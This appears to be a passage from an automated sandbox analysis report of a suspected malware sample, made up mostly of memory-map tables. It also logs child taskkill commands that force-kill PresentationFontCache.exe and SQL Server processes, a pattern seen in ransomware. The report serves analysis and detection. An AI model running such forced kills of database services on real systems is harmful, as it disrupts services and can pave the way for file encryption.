| private_0x00000000004d0000 | 0x004d0000 | 0x005cffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000005d0000 | 0x005d0000 | 0x00757fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000770000 | 0x00770000 | 0x007affff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000007b0000 | 0x007b0000 | 0x007bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000007f0000 | 0x007f0000 | 0x0082ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000870000 | 0x00870000 | 0x008affff | Private Memory | Readable, Writable |
|
|
|
|
| taskkill.exe | 0x008c0000 | 0x008d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x00000000008e0000 | 0x008e0000 | 0x00a60fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000a70000 | 0x00a70000 | 0x01e6ffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000001e70000 | 0x01e70000 | 0x01f6ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001fb0000 | 0x01fb0000 | 0x01feffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001ff0000 | 0x01ff0000 | 0x0202ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002050000 | 0x02050000 | 0x0208ffff | Private Memory | Readable, Writable |
|
|
|
|
| sortdefault.nls | 0x02090000 | 0x0235efff | Memory Mapped File | Readable |
|
|
|
|
| private_0x00000000023d0000 | 0x023d0000 | 0x0240ffff | Private Memory | Readable, Writable |
|
|
|
|
| fastprox.dll | 0x6a480000 | 0x6a515fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dbghelp.dll | 0x6a520000 | 0x6a60afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdsapi.dll | 0x6a7d0000 | 0x6a7e7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemsvc.dll | 0x6a7f0000 | 0x6a7fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winsta.dll | 0x6a800000 | 0x6a828fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemcomn.dll | 0x6a830000 | 0x6a88bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemprox.dll | 0x6a890000 | 0x6a899fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| framedynos.dll | 0x6a8a0000 | 0x6a8d4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wkscli.dll | 0x6a8e0000 | 0x6a8eefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netutils.dll | 0x6a8f0000 | 0x6a8f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netapi32.dll | 0x6a900000 | 0x6a910fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mpr.dll | 0x73ba0000 | 0x73bb1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wtsapi32.dll | 0x73e30000 | 0x73e3cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64cpu.dll | 0x73fd0000 | 0x73fd7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x73fe0000 | 0x7403bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x74040000 | 0x7407efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| secur32.dll | 0x74080000 | 0x74087fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x74460000 | 0x7449afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrtremote.dll | 0x749d0000 | 0x749ddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x749e0000 | 0x749f5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| version.dll | 0x74b50000 | 0x74b58fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| srvcli.dll | 0x75330000 | 0x75348fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x753f0000 | 0x753fbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x75400000 | 0x7545ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x755a0000 | 0x7564bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x763f0000 | 0x7648ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| clbcatq.dll | 0x76490000 | 0x76512fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x76520000 | 0x7662ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x76690000 | 0x7677ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x76780000 | 0x767d6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x767e0000 | 0x7683ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x76910000 | 0x7699efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x769a0000 | 0x769b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nsi.dll | 0x76c80000 | 0x76c85fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x76c90000 | 0x76d2cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x76d30000 | 0x76e8bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x76ea0000 | 0x76ea9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ws2_32.dll | 0x77130000 | 0x77164fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x771f0000 | 0x772bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x772c0000 | 0x77305fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x77310000 | 0x7740ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x77410000 | 0x7749ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000774a0000 | 0x774a0000 | 0x77599fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000775a0000 | 0x775a0000 | 0x776befff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x776c0000 | 0x77868fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x778a0000 | 0x77a1ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
| Information | Value |
|---|---|
| ID | #31 |
| File Name | c:\windows\syswow64\taskkill.exe |
| Command Line | TASKKILL /F /IM PresentationFontCache.exe /IM PresentationFontCache.exe |
| Initial Working Directory | C:\Users\kFT6uTQW\Desktop\ |
| Monitor | Start Time: 00:01:30, Reason: Child Process |
| Unmonitor | End Time: 00:02:35, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:05 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0xa78 |
| Parent PID | 0xbb0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A74
0x
A7C
0x
A80
0x
A84
0x
A70
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | Readable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000070000 | 0x00070000 | 0x00071fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| taskkill.exe.mui | 0x00080000 | 0x00083fff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000000090000 | 0x00090000 | 0x00090fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000a0000 | 0x000a0000 | 0x000a0fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000000b0000 | 0x000b0000 | 0x000b0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000000d0000 | 0x000d0000 | 0x0010ffff | Private Memory | Readable, Writable |
|
|
|
|
| locale.nls | 0x00110000 | 0x00176fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000000180000 | 0x00180000 | 0x001bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000001d0000 | 0x001d0000 | 0x0020ffff | Private Memory | Readable, Writable |
|
|
|
|
| kernelbase.dll.mui | 0x00210000 | 0x002cffff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x00000000002f0000 | 0x002f0000 | 0x0032ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000330000 | 0x00330000 | 0x0033ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000380000 | 0x00380000 | 0x003bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000003c0000 | 0x003c0000 | 0x0043ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000440000 | 0x00440000 | 0x005c7fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000005f0000 | 0x005f0000 | 0x006effff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000006f0000 | 0x006f0000 | 0x00870fff | Pagefile Backed Memory | Readable |
|
|
|
|
| taskkill.exe | 0x00880000 | 0x00895fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x00000000008a0000 | 0x008a0000 | 0x01c9ffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000001cf0000 | 0x01cf0000 | 0x01d2ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001d90000 | 0x01d90000 | 0x01dcffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001dd0000 | 0x01dd0000 | 0x01e0ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001e10000 | 0x01e10000 | 0x01f0ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001f40000 | 0x01f40000 | 0x01f7ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001f90000 | 0x01f90000 | 0x01fcffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001ff0000 | 0x01ff0000 | 0x0202ffff | Private Memory | Readable, Writable |
|
|
|
|
| sortdefault.nls | 0x02030000 | 0x022fefff | Memory Mapped File | Readable |
|
|
|
|
| private_0x00000000023c0000 | 0x023c0000 | 0x023fffff | Private Memory | Readable, Writable |
|
|
|
|
| ntdsapi.dll | 0x6a4c0000 | 0x6a4d7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| fastprox.dll | 0x6a4e0000 | 0x6a575fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winsta.dll | 0x6a580000 | 0x6a5a8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemcomn.dll | 0x6a5b0000 | 0x6a60bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemsvc.dll | 0x6a710000 | 0x6a71efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemprox.dll | 0x6a720000 | 0x6a729fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dbghelp.dll | 0x6a7b0000 | 0x6a89afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wkscli.dll | 0x6a8a0000 | 0x6a8aefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netapi32.dll | 0x6a8b0000 | 0x6a8c0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wtsapi32.dll | 0x6a8d0000 | 0x6a8dcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| framedynos.dll | 0x6a8e0000 | 0x6a914fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mpr.dll | 0x73ba0000 | 0x73bb1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netutils.dll | 0x73e30000 | 0x73e38fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64cpu.dll | 0x73fd0000 | 0x73fd7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x73fe0000 | 0x7403bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x74040000 | 0x7407efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| secur32.dll | 0x74080000 | 0x74087fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x74460000 | 0x7449afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrtremote.dll | 0x749d0000 | 0x749ddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x749e0000 | 0x749f5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| version.dll | 0x74b50000 | 0x74b58fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| srvcli.dll | 0x75330000 | 0x75348fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x753f0000 | 0x753fbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x75400000 | 0x7545ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x755a0000 | 0x7564bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x763f0000 | 0x7648ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| clbcatq.dll | 0x76490000 | 0x76512fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x76520000 | 0x7662ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x76690000 | 0x7677ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x76780000 | 0x767d6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x767e0000 | 0x7683ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x76910000 | 0x7699efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x769a0000 | 0x769b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nsi.dll | 0x76c80000 | 0x76c85fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x76c90000 | 0x76d2cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x76d30000 | 0x76e8bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x76ea0000 | 0x76ea9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ws2_32.dll | 0x77130000 | 0x77164fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x771f0000 | 0x772bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x772c0000 | 0x77305fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x77310000 | 0x7740ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x77410000 | 0x7749ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000774a0000 | 0x774a0000 | 0x77599fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000775a0000 | 0x775a0000 | 0x776befff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x776c0000 | 0x77868fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x778a0000 | 0x77a1ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
| Information | Value |
|---|---|
| ID | #32 |
| File Name | c:\windows\syswow64\taskkill.exe |
| Command Line | TASKKILL /F /IM SQL Server.exe /IM SQL Server.exe |
| Initial Working Directory | C:\Users\kFT6uTQW\Desktop\ |
| Monitor | Start Time: 00:01:31, Reason: Child Process |
| Unmonitor | End Time: 00:02:35, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:04 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0xa9c |
| Parent PID | 0xbb0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A48
0x
A54
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | Readable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000070000 | 0x00070000 | 0x00071fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| taskkill.exe.mui | 0x00080000 | 0x00083fff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000000090000 | 0x00090000 | 0x00090fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000a0000 | 0x000a0000 | 0x000a0fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000000b0000 | 0x000b0000 | 0x000b0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000000d0000 | 0x000d0000 | 0x0010ffff | Private Memory | Readable, Writable |
|
|
|
|
| locale.nls | 0x00110000 | 0x00176fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x00000000001c0000 | 0x001c0000 | 0x001fffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000210000 | 0x00210000 | 0x0024ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000002b0000 | 0x002b0000 | 0x0032ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000003e0000 | 0x003e0000 | 0x004dffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000004e0000 | 0x004e0000 | 0x00667fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000670000 | 0x00670000 | 0x0067ffff | Private Memory | Readable, Writable |
|
|
|
|
| kernelbase.dll.mui | 0x00680000 | 0x0073ffff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000000780000 | 0x00780000 | 0x007bffff | Private Memory | Readable, Writable |
|
|
|
|
| taskkill.exe | 0x007c0000 | 0x007d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x00000000007e0000 | 0x007e0000 | 0x00960fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000970000 | 0x00970000 | 0x01d6ffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000001d90000 | 0x01d90000 | 0x01dcffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001dd0000 | 0x01dd0000 | 0x01ecffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001ed0000 | 0x01ed0000 | 0x01f0ffff | Private Memory | Readable, Writable |
|
|
|
|
| dbghelp.dll | 0x6a520000 | 0x6a60afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winsta.dll | 0x6a800000 | 0x6a828fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemcomn.dll | 0x6a830000 | 0x6a88bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemprox.dll | 0x6a890000 | 0x6a899fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| framedynos.dll | 0x6a8a0000 | 0x6a8d4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wkscli.dll | 0x6a8e0000 | 0x6a8eefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netutils.dll | 0x6a8f0000 | 0x6a8f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netapi32.dll | 0x6a900000 | 0x6a910fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mpr.dll | 0x73ba0000 | 0x73bb1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wtsapi32.dll | 0x73e30000 | 0x73e3cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64cpu.dll | 0x73fd0000 | 0x73fd7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x73fe0000 | 0x7403bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x74040000 | 0x7407efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| secur32.dll | 0x74080000 | 0x74087fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| version.dll | 0x74b50000 | 0x74b58fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| srvcli.dll | 0x75330000 | 0x75348fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x753f0000 | 0x753fbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x75400000 | 0x7545ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x755a0000 | 0x7564bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x763f0000 | 0x7648ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| clbcatq.dll | 0x76490000 | 0x76512fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x76520000 | 0x7662ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x76690000 | 0x7677ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x76780000 | 0x767d6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x767e0000 | 0x7683ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x76910000 | 0x7699efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x769a0000 | 0x769b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nsi.dll | 0x76c80000 | 0x76c85fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x76c90000 | 0x76d2cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x76d30000 | 0x76e8bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x76ea0000 | 0x76ea9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ws2_32.dll | 0x77130000 | 0x77164fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x771f0000 | 0x772bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x772c0000 | 0x77305fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x77310000 | 0x7740ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x77410000 | 0x7749ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000774a0000 | 0x774a0000 | 0x77599fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000775a0000 | 0x775a0000 | 0x776befff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x776c0000 | 0x77868fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x778a0000 | 0x77a1ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
